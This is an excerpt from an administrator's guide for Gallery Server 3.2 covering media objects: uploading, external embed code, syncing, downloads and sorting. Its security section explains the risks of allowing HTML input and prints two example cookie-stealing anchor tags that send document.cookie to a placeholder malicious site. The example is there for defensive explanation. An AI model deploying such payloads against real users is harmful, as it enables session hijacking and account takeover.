Overview of media objects
A media object is any file or HTML snippet managed by Gallery Server. Typically these are photos, video, audio, and documents, but they can be any file type. The default installation enables JPG and JPEG files. To enable additional types, use the Media Object Types page in the Site administration console.
When a media object is HTML text, it is called an external media object and can be used to:
Link to media objects on other servers such as YouTube videos.
Display custom snippets of HTML.
Link to other web pages by embedding other web pages in an iframe HTML tag.
All media objects can be sorted, moved or copied to another album, deleted and have their captions edited.
Additional features are available for images. Gallery Server extracts metadata such as camera model, shutter speed, and more from images and displays it in the right pane. Gallery Server can also apply a watermark to images, run a slide show, and rotate images.
The available functions depend on the authorization of the logged on user. A user with Administer site permission has unrestricted access to all functions for all albums. A user with restricted access, however, will find certain functions disabled in the Actions menu or toolbar items will be missing from the media object view page.
Any media object - except external media objects - can be downloaded by clicking the Download/Share toolbar item on the media object view page.
Media files are rendered to the browser using HTML defined in templates. For example, .mp4 files are typically rendered in a <video> tag, while Silverlight-compatible files (.wmv, .wma, .mp3, .asf, and .asx) are rendered with the Microsoft Silverlight plug-in. This behavior is fully customizable - you can even vary the HTML by browser. See the section Rendering media objects in the browser for more information.
Gallery Server 3.2 Administrator’s Guide Page 51 of 248
Add media objects
There are several ways to add media objects to the gallery. Each of these is discussed below.
Use a web browser to upload individual files Use a web browser to add external media objects
Use a web browser to upload a ZIP file containing multiple files Sync with existing files
Upload files using a web browser
You can add individual media objects to a single album with this technique.
1. Log on to Gallery Server with an account that has permission to add media objects. 2. Navigate to the album to which you want to add media objects.
3. Choose Add objects from the Actions menu. A page similar to the following appears.
Note: If you do not see the Actions menu, either you are not logged on or the account under which you are logged on does not have permission to execute any of its commands.
Gallery Server 3.2 Administrator’s Guide Page 52 of 248
4. Drag files from another window or click Add files to manually select them. Note: Drag and drop is not supported in some browsers.
5. Optionally select one of the options near the bottom:
Discard original file - When selected, the original file is deleted after the thumbnail and web- optimized versions are created. Administrators can force this option to be always selected through a configuration option on the Media Objects - Images page in the Site Admin area.
Treat ZIP file as media object - When checked, Gallery Server will not extract the contents of any ZIP files that are uploaded. Instead, the ZIP file will be preserved and treated as its own
Gallery Server 3.2 Administrator’s Guide Page 53 of 248
media object. This option will be disabled when the ZIP file extension is disabled on the Media Object Types page in the Site Admin area.
6. Click Add to album. While the files are being transferred to the server, progress indicators display the status.
Note: The caption for each object defaults to the file name. For images, if the title metadata item has been specified, that value is used for the caption instead of the file name.
7. When the upload is complete, you will be redirected to the album view page.
About the upload widget
The upload control is an open source component named Plupload. It offers several nice features, including:
HTML 5 drag and drop support
Ability to resize images in the browser before uploading
Takes advantage of advanced browser features while gracefully degrading when necessary
Progress feedback in medium trust scenarios
Multiple file selection
The upload widget and metadata
As mentioned earlier, the upload widget will try to create a compressed version of images in the browser when the ‘Discard original file’ option is selected. This can greatly reduce the amount of time it takes to transfer files to the server.
In most cases, the image’s metadata is copied to the compressed version so that it can be extracted on the server. However, there is one unfortunate exception. The Silverlight implementation fails to copy the image’s metadata to the compressed file, resulting in the metadata being lost. There are two workarounds:
1. Do not select the ‘Discard original file’ option when uploading files. Instead, delete the original files after they have been uploaded with the ‘Delete original files’ option in the Actions menu.
2. Modify the file upload’s control definition so that it never uses the Silverlight implementation, or at least prefers the Flash one to the Silverlight one. Do this by opening the file gs\pages\task\addobjects.ascx in a text editor and looking for this line:
runtimes: 'html5,silverlight,flash,browserplus,html4',
Either delete Silverlight from the list or rearrange it to be after Flash.
Add external media objects
You can add media objects that refer to objects hosted elsewhere, such as another web site on your intranet or even the internet. These objects are called external media objects and are really nothing more than HTML text that contains anything you want. Typical uses:
Gallery Server 3.2 Administrator’s Guide Page 54 of 248 Link to media objects provided as embed code on other servers (e.g. YouTube).
Display custom snippets of HTML.
Link to other web pages by embedding other web pages in an iframe HTML tag.
For example, you might upload your videos files to YouTube and then add links to those videos within Gallery Server. Since the videos are streamed straight from the external web site, you save disk storage and bandwidth costs.
Any web site that offers embed code can be used. A few common ones are YouTube, MSNBC, CNN,
Comedy Central's Daily Show, and metacafe.
Follow these instructions to add an external media object:
1. Log on to Gallery Server with an account that has permission to add media objects. 2. Navigate to the album to which you want to add media objects.
3. Select the Add objects link from the Actions menu. Click the External Content tab. The screen shown below appears.
Note: If you do not see the Actions menu, either you are not logged on or the account under which you are logged on does not have permission to execute any of its commands.
Gallery Server 3.2 Administrator’s Guide Page 55 of 248
4. Select the type of media object you are adding (audio, image, video, or other). This is used to determine an appropriate thumbnail image for the object.
5. Enter a title.
6. Paste the HTML text into the HTML Fragment / Embed Code textbox.
Gallery Server 3.2 Administrator’s Guide Page 56 of 248
Note: As a security precaution, only administrators are allowed to enter HTML and JavaScript. Read the section Security considerations when allowing HTML and javascript in user-entered input to learn how to adjust this setting.
Note: External media objects do not respect the setting for automatically playing video and audio on the Media Objects - Video / Audio / Other page in the Site Admin area. That setting applies only to media files that are uploaded or synchronized in Gallery Server.
Security considerations when allowing HTML and javascript in user-entered input
In a default installation, only administrators are allowed to enter HTML or javascript in textboxes. This is the safest way to run your gallery, but it effectively prevents less privileged users from creating external media objects.
You can enable HTML input on the Membership - User Settings page in the Site Admin area, as seen here:
Gallery Server 3.2 Administrator’s Guide Page 57 of 248
You can also specify the allowed HTML tags and attributes. The default list does not allow dangerous tags such as <script> and event handlers such as onclick. There are no known security vulnerabilities when HTML is enabled with the default list.
When you add embed code for an external media object, you may receive a message like this:
To assist those searching this document, here is the text version:
“The HTML you entered contains text that is not allowed under the current security settings. If you are an administrator, they can be enabled on the User Settings page in the Site Admin area. Invalid HTML tags: object, param, embed; Invalid HTML attributes: width, height, classid, value, type, bgcolor,
allowfullscreen, allowscriptaccess, wmode; Invalid JavaScript detected: No”
The message is saying you cannot add the HTML because it contains elements and attributes that are not currently allowed. Go to the Membership - User Settings page and add these tags and attributes; then you will be able to add this object.
Use caution when adding HTML tags and attributes to the allowed lists, especially event attributes such as onclick, onmouseover, etc. Consider the following HTML snippet, which sends the logged-on user's cookie to a remote web site and is a common technique used in session hijacking attacks to impersonate another user:
Gallery Server 3.2 Administrator’s Guide Page 58 of 248
In a default installation, this text cannot be entered by non-administrators anywhere in the gallery because it contains HTML. If you enable HTML, the text is still not valid because it contains the onclick attribute which is not in the list of allowed HTML attributes. However, if you add onclick to the list, this text can be entered, even if you have the javascript option disabled.
This is because javascript is very difficult to accurately detect. As shown in the screen shot above, there is a configuration option to prevent javascript, but this setting only looks for the presence of the <script> tag and the string "javascript:", and neither of these are present in the HTML example above. Sure, Gallery Server could search for document.cookie, but if it does that it needs to search for all the possible javascript statements, which is cumbersome and error-prone.
Note that the following sample does not work and is therefore not a security risk:
<a href="document.location='http://www.malicioussite.com/s.cgi?' + document.cookie">Click me</a>
Even though the a tag and href attribute are in the list of allowed HTML, hyperlinks require the use of the string "javascript:" like this:
<a href="javascript:document.location='http://www.malicioussite.com/s.cgi?' + document.cookie">Click me</a>
All of the allowed attributes in a default Gallery Server installation require the use of the string "javascript:", so as long as you are restricting javascript input, you are protected.
Upload a ZIP file containing multiple files
This is a flexible technique allowing you to efficiently add a number of media objects very quickly. First prepare a ZIP file containing the files you wish to add to Gallery Server, then upload the ZIP file using the Add objects menu option.
Note: If the ZIP file contains multiple directories, even nested ones, then those directories are converted to albums.
Sync with existing files
If you have a large number of files, use the synchronization feature to synchronize the gallery database with the files.
By default, Gallery Server stores all media object files in a subdirectory named \gs\mediaobjects\. 1. Go to Media Objects – General in the Site admin area.
2. Update the setting Path to original file directory to point to the directory containing your media files. You can enter a path relative to the web application or a full physical path to any UNC- accessible location. Examples: C:\my_media, gs\mediaobjects, \\server1\media, \\mynas\media
Note: Instead of changing the media directory, you may prefer to copy your files to the default location gs\mediaobjects\.
Gallery Server 3.2 Administrator’s Guide Page 59 of 248
TIP: Select the option Media files are read only to prevent Gallery Server from changing your original media files. A read-only gallery has several requirements:
User albums must be disabled
The directory for the thumbnail and compressed images must be different than the original media objects directory
The option Synchronize directory names with album titles must be disabled
3. Optional – Enter a path for the thumbnail and web-optimized files. If left blank, these files will be created in the same location as the original files. It is recommended that you specify an alternate location such as D:\media_cache.
4. Click Save changes.
5. Select Synchronize from the Actions menu and synchronize your gallery. See Synchronize an Album
for more information.
Note: Changing the location does not move media objects to the new location. For example, if you choose a new location for thumbnail images, you should immediately synchronize the database to generate new thumbnails in the new location (or you can use Windows Explorer to manually copy the files). If you change the media objects path and then synchronize the database, the files in the new location will replace all database entries for the previous media objects. Use care so you do not inadvertently delete objects.
View/edit media object properties
Each media object has several properties such as title, caption, tags, etc. Several are extracted from media files, such as the EXIF or IPTC metadata often found in images. By default some of these properties are editable while others are read only. You can change which items are editable on the Metadata page in the Site Admin area.
In most cases, properties are updated in the right pane. For example, here we’ve selected the image with the caption “Near Death Valley, CA” and then entered a new title in the right pane:
Gallery Server 3.2 Administrator’s Guide Page 60 of 248
TIME SAVING TIP! If you select multiple thumbnail images, you can apply a property to several items at once. For example, quickly tag all images by highlighting them with the mouse and then typing the tag in the right pane.
Gallery Server 3.2 Administrator’s Guide Page 62 of 248
Note: HTML and javascript can be entered only by administrators unless explicitly enabled on the Membership - User Settings page in the Site Admin area.
Download media objects
Users can download a media object one at a time or by using the built-in ZIP download functionality. Users are allowed to download only those objects they have permission to view. If watermarking is enabled, the downloaded images will contain a watermark.
You can disable the download functionality on the Media Objects - General page in the Site Admin area. While this prevents users from using the built-in functionality to download the media files, note that the fundamental nature of HTML means that if a user can view a media object, they have access to the file.
When viewing a media object, there is a download/share button in the toolbar above the object. Clicking this button opens a dialog window with several options:
Gallery Server 3.2 Administrator’s Guide Page 63 of 248
Choose the size you want (thumbnail, web-optimized, or original) and click Download file. To download multiple items, click Download album, where you can choose one or more media objects from the album:
Gallery Server 3.2 Administrator’s Guide Page 64 of 248
A few important points about downloading objects:
Only users who have permission to view the original files are able to download them.
When an album is selected on the Download media objects page, all of its contents, including child albums, are packaged into the ZIP archive. If this is done on an album with thousands of items, it may require a great deal of server resources and a lot of bandwidth. For this reason you may want to disable the downloading of albums. Do this in the Download section of the Media Objects – General page in the Site admin area.
The Download media objects page can also be opened from two additional places in Gallery Server. There is an item on the Actions menu:
Gallery Server 3.2 Administrator’s Guide Page 65 of 248
And there is an icon in the album header area:
Sort media objects
Albums can be sorted in a customized manner using drag and drop or by a property such as title or date picture taken. By default, albums are sorted by the date they are added to the gallery. This setting can be changed on the Albums – General page in the Site admin area.
Gallery Server 3.2 Administrator’s Guide Page 66 of 248 Sort by a property
To sort by a property such as title or date picture taken, use the sort dropdown button that is shown when viewing an album. In the following screenshot, we see that the items are currently sorted by date added in ascending order. To sort on a different property, select it from the dropdown. To switch between ascending and descending, click the up/down button in the split button.
Any user can sort an album. The scope of the sorting depends on the user’s permission:
Anonymous user – When a non-logged on user sorts an album, the preference is stored in the user’s session and re-applied for the duration of the session. Other users do not see these changes.
Logged-on user with read permission – A permanent profile record exists for each user. This profile stores the user’s sort preference for each album and is persisted across sessions.